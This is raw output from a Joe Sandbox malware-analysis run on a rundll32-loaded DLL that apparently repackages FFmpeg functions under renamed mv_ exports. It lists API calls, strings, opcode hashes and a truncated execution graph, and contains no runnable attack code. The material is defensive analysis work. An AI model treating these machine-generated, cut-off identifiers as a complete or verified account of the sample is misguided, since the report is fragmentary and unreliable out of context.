                                                                      • String ID: is not implemented. Update your FFmpeg version to the newest one from Git. If the problem still occurs, it means that your file has a feature which has not been implemented.$If you want to help, upload a sample of this file to https://streams.videolan.org/upload/ and contact the ffmpeg-devel mailing list. (ffmpeg-devel@ffmpeg.org)
                                                                      • API String ID: 2418673259-452301706
                                                                      • Opcode ID: e6cf6ba8b22bf0788caeb5b2bc13ebdcd15b2fa09116b02164e182888be3a209
                                                                      • Instruction ID: cd8e871a35f16579d6f3ce221cb9c29d0fa83c6cca779b8fa567d44589e44066
                                                                      • Opcode Fuzzy Hash: e6cf6ba8b22bf0788caeb5b2bc13ebdcd15b2fa09116b02164e182888be3a209
                                                                      • Instruction Fuzzy Hash: 93110978A087458BD344DF19EA8021EBBE2FFCC744F91C92DE4888B355DA34D9449B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097AD
                                                                      • mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB
                                                                      • mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009C05
                                                                      • mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009C65
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprintf
                                                                      • String ID: &amp;$&gt;
                                                                      • API String ID: 3083893021-624094588
                                                                      • Opcode ID: f6f8d3d5fc7b62e55630e6ba9b01de786338a4dbd923bb065a803ba8d4e77ea4
                                                                      • Instruction ID: 827a1dd9a6b26f0f52677796166c22f358f1b9d0e9bb7a9b4a6d704745ef5d9f
                                                                      • Opcode Fuzzy Hash: f6f8d3d5fc7b62e55630e6ba9b01de786338a4dbd923bb065a803ba8d4e77ea4
                                                                      • Instruction Fuzzy Hash: B6F03071C08B55CADB50EFA485503AAB7E5EB453D0F81480EE5DA9B249CB34FC86C782
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • If you want to help, upload a sample of this file to https://streams.videolan.org/upload/ and contact the ffmpeg-devel mailing list. (ffmpeg-devel@ffmpeg.org), xrefs: 10026797
                                                                      • is not implemented. Update your FFmpeg version to the newest one from Git. If the problem still occurs, it means that your file has a feature which has not been implemented., xrefs: 10026780
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_log
                                                                      • String ID: is not implemented. Update your FFmpeg version to the newest one from Git. If the problem still occurs, it means that your file has a feature which has not been implemented.$If you want to help, upload a sample of this file to https://streams.videolan.org/upload/ and contact the ffmpeg-devel mailing list. (ffmpeg-devel@ffmpeg.org)
                                                                      • API String ID: 2418673259-452301706
                                                                      • Opcode ID: 726f5603a65502359e655967f00b1600284beb5137becb6436dd4fcad8af556a
                                                                      • Instruction ID: 749b7b172e694e1bef6e0ea00623f78dc4c312dad7cdc32441d2dd052aa7ac3c
                                                                      • Opcode Fuzzy Hash: 726f5603a65502359e655967f00b1600284beb5137becb6436dd4fcad8af556a
                                                                      • Instruction Fuzzy Hash: D7F09DB8A087059BC744DF29D98026EBBE0EFCD744F90CD2DA49897355DA38E9449B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • If you want to help, upload a sample of this file to https://streams.videolan.org/upload/ and contact the ffmpeg-devel mailing list. (ffmpeg-devel@ffmpeg.org), xrefs: 10026797
                                                                      • is not implemented. Update your FFmpeg version to the newest one from Git. If the problem still occurs, it means that your file has a feature which has not been implemented., xrefs: 10026780
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_log
                                                                      • String ID: is not implemented. Update your FFmpeg version to the newest one from Git. If the problem still occurs, it means that your file has a feature which has not been implemented.$If you want to help, upload a sample of this file to https://streams.videolan.org/upload/ and contact the ffmpeg-devel mailing list. (ffmpeg-devel@ffmpeg.org)
                                                                      • API String ID: 2418673259-452301706
                                                                      • Opcode ID: 8c63f5b068e4a02c16e5e4e3d6ed8fca3382fd8153a0e1c5dc78481aba7fba1a
                                                                      • Instruction ID: 20e3eb0074f28b37b3f93e03534fea868915181d0f0dff0f0c45d1e812b63dfd
                                                                      • Opcode Fuzzy Hash: 8c63f5b068e4a02c16e5e4e3d6ed8fca3382fd8153a0e1c5dc78481aba7fba1a
                                                                      • Instruction Fuzzy Hash: 54F0AFB8A087049BC344DF29D98025EBBE0EFCC744F90CC2DA49897351DA38DA449B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_image_fill_linesizes.F072 ref: 1001B0C8
                                                                        • Part of subcall function 100215D0: mv_pix_fmt_desc_get.F072(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 100215E6
                                                                      • mv_image_fill_plane_sizes.F072 ref: 1001B15D
                                                                      • mv_buffer_alloc.F072 ref: 1001B1CD
                                                                      • mv_image_fill_pointers.F072 ref: 1001B1FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_buffer_allocmv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_fill_pointersmv_pix_fmt_desc_get
                                                                      • String ID:
                                                                      • API String ID: 2879504290-0
                                                                      • Opcode ID: 104ea71f64bcf6d5fcf77d597bbab15b8274068533c11a176288c866d61d2df4
                                                                      • Instruction ID: 7a3e12a9aca585330d458c3661a5f2850fdcc4197d16b6054e58506080106dfe
                                                                      • Opcode Fuzzy Hash: 104ea71f64bcf6d5fcf77d597bbab15b8274068533c11a176288c866d61d2df4
                                                                      • Instruction Fuzzy Hash: 1F51F8B5608B018FCB48DF69D59066ABBE1FF88240F1589BDE949CB319E731E844CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_freepmv_mallocstrlen
                                                                      • String ID:
                                                                      • API String ID: 2899962033-0
                                                                      • Opcode ID: b60561e94974d849901b234290bbe7a995fa381d40c40a5b191f302676304302
                                                                      • Instruction ID: 783c96028185269aaff1eccff1d3a6d32e800164aef8f2b7fbae3f80fe3a419f
                                                                      • Opcode Fuzzy Hash: b60561e94974d849901b234290bbe7a995fa381d40c40a5b191f302676304302
                                                                      • Instruction Fuzzy Hash: 51319975A08F154ED310EE79A4D13A67BC9DF82394FD1092FDE9887383C5369889C741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsDBCSLeadByteEx.KERNEL32 ref: 100A0342
                                                                      • MultiByteToWideChar.KERNEL32 ref: 100A0385
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Byte$CharLeadMultiWide
                                                                      • String ID:
                                                                      • API String ID: 2561704868-0
                                                                      • Opcode ID: ff6f7197c44d7e7dccd4158c33b178a144c6c1fe7609a9ede9ad65282b7dc5a0
                                                                      • Instruction ID: 7d595e0308f4db80fc988514bbf5ff759a63fd2ee38edf780f56cffaa40d1ea8
                                                                      • Opcode Fuzzy Hash: ff6f7197c44d7e7dccd4158c33b178a144c6c1fe7609a9ede9ad65282b7dc5a0
                                                                      • Instruction Fuzzy Hash: 3D31F4B1509351CFDB40DF69D48420ABBE0FF8A354F05896DF9D48B290E3B6DA48CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_mallocz.F072 ref: 1001F0A0
                                                                      • mv_realloc_f.F072 ref: 1001F0DD
                                                                        • Part of subcall function 10028DE0: _aligned_realloc.MSVCRT ref: 10028E11
                                                                      • mv_buffer_create.F072 ref: 1001F128
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: _aligned_reallocmv_buffer_createmv_malloczmv_realloc_f
                                                                      • String ID:
                                                                      • API String ID: 2794559729-0
                                                                      • Opcode ID: 26fbe21ab545ebdd34baa87320ddca8e1bb2c4f4deb69b9881e6a88837f94b66
                                                                      • Instruction ID: c869ac9f6eaa7e77a9466fdee6e8f712de869673a1390132f44f2bab79372784
                                                                      • Opcode Fuzzy Hash: 26fbe21ab545ebdd34baa87320ddca8e1bb2c4f4deb69b9881e6a88837f94b66
                                                                      • Instruction Fuzzy Hash: 8031ACB4A08701DFC300DF29C58051AFBF1FF98250F568A6EE9889B321D771E881CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_fifo_can_read.F072 ref: 100027C7
                                                                      • mv_fifo_can_write.F072 ref: 100027D6
                                                                      • mv_samples_get_buffer_size.F072 ref: 100027FF
                                                                      • mv_fifo_grow2.F072 ref: 10002833
                                                                        • Part of subcall function 10017F70: mv_realloc_array.F072(?,?,?,?,?,?,?,?,?,?,?,?,?,?,10002838), ref: 10017FAE
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_fifo_can_readmv_fifo_can_writemv_fifo_grow2mv_realloc_arraymv_samples_get_buffer_size
                                                                      • String ID:
                                                                      • API String ID: 78108474-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_buffer_alloc.F072(?,?,?,?,?,?,?,?,1001284A), ref: 1001B7F0
                                                                        • Part of subcall function 10009DC0: mv_malloc.F072 ref: 10009DDC
                                                                        • Part of subcall function 10009DC0: mv_mallocz.F072 ref: 10009DF2
                                                                        • Part of subcall function 10009DC0: mv_mallocz.F072 ref: 10009E25
                                                                      • mv_realloc.F072(?,?,?,?,?,?,?,?,1001284A), ref: 1001B820
                                                                        • Part of subcall function 10028DA0: _aligned_realloc.MSVCRT ref: 10028DCB
                                                                      • mv_mallocz.F072(?,?,?,?,?,?,?,?,1001284A), ref: 1001B836
                                                                      • mv_buffer_unref.F072(?,?,?,?,?,?,?,?,1001284A), ref: 1001B87F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_mallocz$_aligned_reallocmv_buffer_allocmv_buffer_unrefmv_mallocmv_realloc
                                                                      • String ID:
                                                                      • API String ID: 547404713-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_bprint_init.F072 ref: 10007076
                                                                      • mv_bprint_escape.F072 ref: 100070AA
                                                                        • Part of subcall function 10009730: mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB
                                                                      • mv_bprint_finalize.F072 ref: 100070C7
                                                                        • Part of subcall function 10009690: mv_realloc.F072(?,?,?,?,?,?,10006D57), ref: 100096C9
                                                                      • mv_bprint_finalize.F072 ref: 100070F1
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprint_finalize$mv_bprint_escapemv_bprint_initmv_bprintfmv_realloc
                                                                      • String ID:
                                                                      • API String ID: 2707718180-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_freep
                                                                      • String ID:
                                                                      • API String ID: 2373662943-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: fputc
                                                                      • String ID: NaN
                                                                      • API String ID: 1992160199-1757892521
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • Assertion %s failed at %s:%d, xrefs: 100224BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_get_cpu_flags
                                                                      • String ID: Assertion %s failed at %s:%d
                                                                      • API String ID: 185405932-2766368343
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • Assertion %s failed at %s:%d, xrefs: 100225D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: abortmv_log
                                                                      • String ID: Assertion %s failed at %s:%d
                                                                      • API String ID: 2075109169-2766368343
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_image_get_linesize.F072 ref: 10022203
                                                                        • Part of subcall function 10021480: mv_pix_fmt_desc_get.F072(?,?,?,?,?,?,?,?,?,?,00000000,?,100B6C20,00000000,10022208), ref: 10021496
                                                                      Strings
                                                                      • Picture size %ux%u is invalid, xrefs: 1002228D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_image_get_linesizemv_pix_fmt_desc_get
                                                                      • String ID: Picture size %ux%u is invalid
                                                                      • API String ID: 645864070-1963597007
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprint_init_for_buffermv_bprintf
                                                                      • String ID: none
                                                                      • API String ID: 2490314137-2140143823
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_strlcatf.F072 ref: 10012429
                                                                        • Part of subcall function 100067F0: strlen.MSVCRT ref: 1000680A
                                                                      • mv_dict_set.F072 ref: 1001244D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_dict_setmv_strlcatfstrlen
                                                                      • String ID: .%06dZ
                                                                      • API String ID: 1014950348-3752268379
                                                                      • Opcode ID: 112283aaecfa77c8f98fb54c5a0ced329aef4e4efddc2c3c9d6336029b181351
                                                                      • Instruction ID: 95eb8ff42823485582616919598dcae06947ee25e4005e9b3a20f874dc0564a5
                                                                      • Opcode Fuzzy Hash: 112283aaecfa77c8f98fb54c5a0ced329aef4e4efddc2c3c9d6336029b181351
                                                                      • Instruction Fuzzy Hash: DAE04EB5908740AFD714DF29E48175ABBE0FB88354F51C82EB49C97306D63898418B46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • The hardware pixel format '%s' is not supported by the device type '%s', xrefs: 1001EA03
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_callocmv_frame_allocmv_frame_freemv_freepmv_get_pix_fmt_namemv_image_check_sizemv_log
                                                                      • String ID: The hardware pixel format '%s' is not supported by the device type '%s'
                                                                      • API String ID: 473889652-379977042
                                                                      • Opcode ID: 61d72b4d4c2e0655fcbe5d0e6275bddd9b2c6f8c5749a3447ccd53c07b7555cd
                                                                      • Instruction ID: 4d1730ca70439439150dc69e2c3e69577fa63277b803d74fdee23c8a3be9cec6
                                                                      • Opcode Fuzzy Hash: 61d72b4d4c2e0655fcbe5d0e6275bddd9b2c6f8c5749a3447ccd53c07b7555cd
                                                                      • Instruction Fuzzy Hash: 56F01978608B418FC710DF28C58051EBBE0EB49720F518A59EAA99B395DB34EC80DB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:6.7%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:6.1%
                                                                      Total number of Nodes:1433
                                                                      Total number of Limit Nodes:4
12632 494f91d 12631->12632 12633 494f96b 12631->12633 12638 494f8ef 12631->12638 12635 494e75d 3 API calls 12632->12635 12634 494911f RtlAllocateHeap 12633->12634 12636 494f976 12634->12636 12637 494f927 12635->12637 12636->12638 12639 494f990 12636->12639 12641 494913b 2 API calls 12636->12641 12637->12639 12640 494f76a 4 API calls 12637->12640 12638->12459 12643 494f9b8 12639->12643 12644 494913b 2 API calls 12639->12644 12642 494f941 12640->12642 12641->12639 12642->12636 12646 494f947 12642->12646 12645 494913b 2 API calls 12643->12645 12644->12643 12645->12638 12647 494913b 2 API calls 12646->12647 12647->12638 12649 494e850 12648->12649 12650 494e856 GetLastError 12649->12650 12651 494e860 GetLastError 12649->12651 12652 494e86d 12650->12652 12651->12652 12652->12481 12654 4941b6c 12653->12654 12655 4941b9f 12654->12655 12707 4942aec 12654->12707 12657 494d130 8 API calls 12655->12657 12694 4941bd3 12655->12694 12658 4941bb1 12657->12658 12659 494cf1d 6 API calls 12658->12659 12660 4941bc1 12659->12660 12661 4941bcf 12660->12661 12723 4941ad7 12660->12723 12661->12694 12731 4941a7a 12661->12731 12664 4941be4 12665 494d146 6 API calls 12664->12665 12666 4941c0c 12665->12666 12742 4942bd3 12666->12742 12669 4949924 2 API calls 12670 4941c3a 12669->12670 12671 4941c5c 12670->12671 12672 4949787 RtlAllocateHeap 12670->12672 12673 494aa27 10 API calls 12671->12673 12674 4941c4e 12672->12674 12675 4941c7b 12673->12675 12676 4949787 RtlAllocateHeap 12674->12676 12675->12694 12776 494ae9a 12675->12776 12676->12671 12679 494aed3 6 API calls 12680 4941ca4 12679->12680 12780 494ae75 12680->12780 12683 4941cc6 12685 4941cd7 12683->12685 12686 494b41a 7 API calls 12683->12686 12790 494c2d1 GetSystemTimeAsFileTime 12685->12790 12686->12685 12688 4941cde 12792 494ae47 12688->12792 12692 4941d06 12692->12694 12807 494cae4 12692->12807 12694->12486 12694->12488 12947 494e42e 12695->12947 12697 4941e4d 12697->12488 12697->12497 12699 494e42e RtlAllocateHeap 12699->12697 12701 
49492a2 memset 12700->12701 12702 494c3c7 12701->12702 12703 49492a2 memset 12702->12703 12704 494c3d3 12703->12704 12705 4941f66 12704->12705 12706 494c42a GetExitCodeProcess 12704->12706 12705->12514 12706->12705 12708 4942b08 12707->12708 12709 4942ba0 12708->12709 12710 49416ec 2 API calls 12708->12710 12709->12655 12711 4942b18 12710->12711 12712 4949924 2 API calls 12711->12712 12713 4942b2a 12712->12713 12714 4949d66 2 API calls 12713->12714 12715 4942b35 12714->12715 12716 49416ec 2 API calls 12715->12716 12717 4942b3f 12716->12717 12841 4950066 12717->12841 12720 4949d66 2 API calls 12721 4942b5b 12720->12721 12722 494913b 2 API calls 12721->12722 12722->12709 12724 494d130 8 API calls 12723->12724 12725 4941ae0 12724->12725 12847 494e348 12725->12847 12728 4941aee 12728->12661 12729 494913b 2 API calls 12730 4941b32 12729->12730 12730->12661 12732 49497fa 2 API calls 12731->12732 12733 4941a85 12732->12733 12734 49490ea 2 API calls 12733->12734 12735 4941aad 12734->12735 12736 4949924 2 API calls 12735->12736 12737 4941ab9 12736->12737 12738 4949d66 2 API calls 12737->12738 12739 4941ac4 12738->12739 12740 494913b 2 API calls 12739->12740 12741 4941acf 12740->12741 12741->12664 12856 494cfa2 12742->12856 12744 4942bec 12745 4942c6d 12744->12745 12746 4942bf8 12744->12746 12748 4942aec 5 API calls 12745->12748 12747 49416ec 2 API calls 12746->12747 12749 4942c02 12747->12749 12750 4942c7f 12748->12750 12755 4942c23 12749->12755 12756 4942c2c 12749->12756 12751 4942c84 12750->12751 12752 4942cce 12750->12752 12872 4949ee8 memset memset 12751->12872 12753 4942ba8 4 API calls 12752->12753 12763 4942c6a 12753->12763 12865 4942ba8 12755->12865 12760 49416ec 2 API calls 12756->12760 12757 4942c8f 12759 49416ec 2 API calls 12757->12759 12761 4942c99 12759->12761 12762 4942c36 12760->12762 12764 4949924 2 API calls 12761->12764 12765 4949924 2 API calls 12762->12765 12767 4942ce3 CreateDirectoryW 12763->12767 12775 4941c18 12763->12775 12768 4942cbe 12764->12768 
12769 4942c53 12765->12769 12766 4949d66 2 API calls 12766->12763 12770 4942cef 12767->12770 12771 4949d66 2 API calls 12768->12771 12772 4949d66 2 API calls 12769->12772 12773 494913b 2 API calls 12770->12773 12770->12775 12771->12763 12774 4942c28 12772->12774 12773->12775 12774->12766 12775->12669 12775->12694 12777 494aeae 12776->12777 12778 494b044 6 API calls 12777->12778 12779 4941c97 12778->12779 12779->12679 12781 494ae47 6 API calls 12780->12781 12782 4941cb4 12781->12782 12782->12683 12783 494b41a 12782->12783 12784 494b484 12783->12784 12786 494b42b 12783->12786 12784->12683 12785 494adf7 4 API calls 12785->12786 12786->12784 12786->12785 12787 494b44f GetLastError 12786->12787 12788 494ae75 6 API calls 12786->12788 12789 494ae9a 6 API calls 12786->12789 12787->12786 12788->12786 12789->12786 12791 494c303 12790->12791 12791->12688 12793 494b044 6 API calls 12792->12793 12794 4941cea 12793->12794 12794->12692 12795 4951557 12794->12795 12796 4951569 12795->12796 12797 494918a RtlAllocateHeap 12796->12797 12799 4951573 12796->12799 12798 4951583 12797->12798 12798->12799 12800 494e91f lstrlenW 12798->12800 12799->12692 12801 495159a 12800->12801 12802 49515d4 12801->12802 12803 494cae4 6 API calls 12801->12803 12804 494913b 2 API calls 12802->12804 12805 49515c7 12803->12805 12804->12799 12805->12802 12876 4951279 12805->12876 12808 494caf4 12807->12808 12826 494cb38 12807->12826 12809 494911f RtlAllocateHeap 12808->12809 12810 494cafe 12809->12810 12811 494cb10 12810->12811 12812 494cbdd 12810->12812 12810->12826 12813 49490ea 2 API calls 12811->12813 12814 4949924 2 API calls 12812->12814 12815 494cb1a 12813->12815 12814->12826 12816 494cb24 12815->12816 12817 494cb42 12815->12817 12820 4949d66 2 API calls 12816->12820 12818 494cb6e 12817->12818 12819 494cb49 12817->12819 12822 49490ea 2 API calls 12818->12822 12821 49497fa 2 API calls 12819->12821 12823 494cb2d 12820->12823 12829 494cb4e 12821->12829 12825 494cb78 12822->12825 12824 494913b 2 API 
calls 12823->12824 12824->12826 12827 4949787 RtlAllocateHeap 12825->12827 12826->12694 12828 494cb82 12827->12828 12830 4949d66 2 API calls 12828->12830 12832 4949924 2 API calls 12829->12832 12831 494cb90 12830->12831 12831->12829 12833 494cb96 12831->12833 12834 494cbc2 12832->12834 12835 494913b 2 API calls 12833->12835 12836 4949d66 2 API calls 12834->12836 12837 494cba1 12835->12837 12838 494cbd0 12836->12838 12839 494913b 2 API calls 12837->12839 12840 4949d66 2 API calls 12838->12840 12839->12826 12840->12826 12842 4950093 12841->12842 12843 4942b4d 12842->12843 12844 494911f RtlAllocateHeap 12842->12844 12843->12720 12845 49500c3 12844->12845 12845->12843 12846 494913b 2 API calls 12845->12846 12846->12843 12848 494bfab 7 API calls 12847->12848 12849 494e35a 12848->12849 12850 49490ca 2 API calls 12849->12850 12851 494e364 12850->12851 12852 49498d1 2 API calls 12851->12852 12853 494e373 12852->12853 12854 4949d4c 2 API calls 12853->12854 12855 4941ae7 12854->12855 12855->12728 12855->12729 12857 49490ca 2 API calls 12856->12857 12858 494cfbc 12857->12858 12859 4954b56 2 API calls 12858->12859 12862 494cff2 12859->12862 12860 494d036 12861 4949d4c 2 API calls 12860->12861 12863 494d045 12861->12863 12862->12860 12864 4954b56 2 API calls 12862->12864 12863->12744 12864->12862 12866 49416ec 2 API calls 12865->12866 12867 4942bb7 12866->12867 12868 4949787 RtlAllocateHeap 12867->12868 12869 4942bc1 12868->12869 12870 4949d66 2 API calls 12869->12870 12871 4942bcc 12870->12871 12871->12774 12873 4949f38 12872->12873 12874 494db58 4 API calls 12873->12874 12875 4949f3d 12874->12875 12875->12757 12877 4951317 12876->12877 12878 4951293 12876->12878 12880 49490ea 2 API calls 12877->12880 12879 49416ec 2 API calls 12878->12879 12881 495129f 12879->12881 12882 4951321 12880->12882 12883 494911f RtlAllocateHeap 12881->12883 12905 494cc03 12882->12905 12885 49512ad 12883->12885 12887 4954b56 2 API calls 12885->12887 12889 49512c7 12887->12889 12888 4949d66 2 API 
